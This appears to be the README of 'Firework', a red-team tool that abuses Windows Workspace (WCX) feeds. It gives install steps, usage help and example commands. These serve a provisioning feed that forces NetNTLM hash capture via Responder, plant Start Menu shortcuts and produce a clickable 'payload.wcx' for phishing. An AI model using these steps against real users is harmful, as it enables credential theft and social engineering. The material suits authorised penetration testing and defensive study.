- Phish for credentials – NetNTLM hashes can be sent if a user enters their credentials (or automatically on older versions of Windows).
- Add items to the Start Menu – After set-up, shortcuts are added to the Start Menu which launch the served RDP file(s). These entries could potentially be used as part of a wider social engineering campaign.
- Download resources – Resources such as the .rdp files and icon files are downloaded and updated by Windows on a daily basis (if authentication of the feed is disabled or is satisfied).
Read the SpiderLabs blog for a more detailed summary and walkthrough.
- Tested with Python 2.7.x. (Python 3 not currently supported, although the main Firework class could be used in Python 3)
$ pip install -r requirements.txt
- The tool serves content over HTTPS and requires a certificate and private key to use the in-built web server with NetNTLM capture. Default files: cert.crt and key.pem
usage: firework.py [-h] -c COMPANY -u URL -a APP -e EXT -i ICON [-l LISTEN] [-r RDP] [-d DOMAIN] [-n USERNAME] [-p PASSWORDHASH] [-t CERT] [-k KEY]

WCX workplace tool

optional arguments:
  -h, --help            show this help message and exit
  -c COMPANY, --company COMPANY
                        Company name
  -u URL, --url URL     Feed URL
  -a APP, --app APP     App Name
  -e EXT, --ext EXT     App Extension
  -i ICON, --icon ICON  App Icon
  -l LISTEN, --listen LISTEN
                        TLS Web Server Port
  -r RDP, --rdp RDP     RDP Server
  -d DOMAIN, --domain DOMAIN
                        RDP Domain
  -n USERNAME, --username USERNAME
                        RDP Username
  -p PASSWORD, --password PASSWORD
                        RDP Password
  -t CERT, --cert CERT  SSL cert
  -k KEY, --key KEY     SSL key
- Organisation Name: EvilCorp
- URL to feed XML (or URL to Firework's in-built server): https://example.org/ – This is where Windows downloads the feed from.
- Application Name: Firework
- File Extension: .fwk
- Icon File: firework.ico
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico
The in-built web server will start on port 443 if cert.crt and key.pem are present in the current directory. This will force an NTLM challenge with responder. If these files are not present, the tool will write all files to the local directory for your own hosting.
If you wish to start the in-built web server on an alternate port, use the -l flag as below:
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico -l 8443
You can also add some customisations to the .rdp file that gets served.
- Remote Desktop Server: dc.corp.local
- Domain: corp.local
- Username: admin
- Password Crypt: Encrypted password that gets included in the RDP file
Note: Passwords stored in .rdp files are likely ignored in a default config.
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico -r dc.corp.local -d corp.local -n admin -p <crypt password>
Having run the tool, 'payload.wcx' will be written to the current directory. This file is what, when clicked on, starts the provisioning process.